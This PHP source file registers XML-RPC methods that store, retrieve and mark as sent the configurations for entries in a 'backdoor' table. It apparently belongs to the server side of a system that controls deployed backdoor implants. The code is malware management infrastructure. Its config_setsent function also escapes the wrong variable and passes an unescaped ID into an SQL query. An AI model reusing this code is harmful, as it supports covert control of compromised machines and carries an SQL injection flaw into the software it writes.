<?php

//////////
///
///   config.inc.php
///
//////////
///
///   config_set($backdoor, $content)
///   config_setsent($config)
///   config_get($backdoor)
///
//////////

require_once('lib/commons.inc.php');



/*************\
*   METHODS   *
\*************/

if($al & AL_SERV) {
   $dm['config.set']['function'] = 'config_set';
//   $dm['config.set']['signature'] = array(array($xmlrpcBoolean,    // return value
//                                                $xmlrpcString,     // $backdoor
//                                                $xmlrpcBase64));   // $content
}

if($al & AL_SERV) {
   $dm['config.setsent']['function'] = 'config_setsent';
//   $dm['config.setsent']['signature'] = array(array($xmlrpcBoolean,   // return value
//                                                    $xmlrpcInt));     // $config
}

if($al & AL_SERV) {
   $dm['config.get']['function'] = 'config_get';
//   $dm['config.get']['signature'] = array(array($xmlrpcStruct,     // return value
//                                                $xmlrpcString));   // $backdoor
}



/***************\
*   FUNCTIONS   *
\***************/

function config_set($backdoor, $content)
{
   $err_map[1452] = $GLOBALS['err_config']['invbackdoor'];

   $ret = db_escape(array(&$backdoor,
                          &$content));

   if(is_object($ret)) {
      return $ret;
   }

   $ret = trace('config.set', $backdoor);

   if(is_object($ret)) {
      return $ret;
   }

   $sql  = "SELECT `backdoor_id` ";
   $sql .= "FROM `backdoor` ";
   $sql .= "WHERE `backdoor` = '$backdoor'";

   $ret = db_query($sql);

   if(is_object($ret)) {
      return $ret;
   } else if($ret === false) {
      return $GLOBALS['err_config']['invbackdoor'];
   }
   
   $backdoor_id = $ret[0]->backdoor_id;
   
   $sql  = "DELETE FROM `config` ";
   $sql .= "WHERE `backdoor_id` = '$backdoor_id'";

   $ret = db_query($sql);

   if(is_object($ret)) {
      return $ret;
   }

   $sql  = "INSERT INTO `config` (`backdoor_id`, ";
   $sql .=                       "`content`) ";
   $sql .= "VALUES ('$backdoor_id', ";
   $sql .=         "'".$content->scalar."')";

   return db_query($sql, $err_map);
}

function config_setsent($config_id)
{
   $ret = db_escape(array(&$config));

   if(is_object($ret)) {
      return $ret;
   }

   $sql  = "UPDATE `config` ";
   $sql .= "SET `sent` = NOW() ";
   $sql .= "WHERE `config_id` = $config_id";

   return db_query($sql);
}

function config_get($backdoor)
{
   $ret = db_escape(array(&$backdoor));

   if(is_object($ret)) {
      return $ret;
   }
   
   $sql  = "SELECT `backdoor_id` ";
   $sql .= "FROM `backdoor` ";
   $sql .= "WHERE `backdoor` = '$backdoor'";

   $ret = db_query($sql);

   if(is_object($ret)) {
      return $ret;
   } else if($ret === false) {
      return $GLOBALS['err_config']['invbackdoor'];
   }
   
   $backdoor_id = $ret[0]->backdoor_id;
   
   $sql  = "SELECT `config_id` AS `config`, ";
   $sql .=        "IFNULL(`sent`, 0) AS `sent`, ";
   $sql .=        "`content` ";
   $sql .= "FROM `config` ";
   $sql .= "WHERE `backdoor_id` = '$backdoor_id'";

   $ret = db_query($sql);

   if(is_object($ret)) {
      return $ret;
   } else if($ret === false) {
      return $GLOBALS['err_config']['noconfig'];
   }

   settype($ret[0]->config, 'integer');
   settype($ret[0]->sent, 'integer');
   if($ret[0]->sent != 0) $ret[0]->sent = 1;
   xmlrpc_set_type($ret[0]->content, 'base64');

   return $ret[0];
}

?>
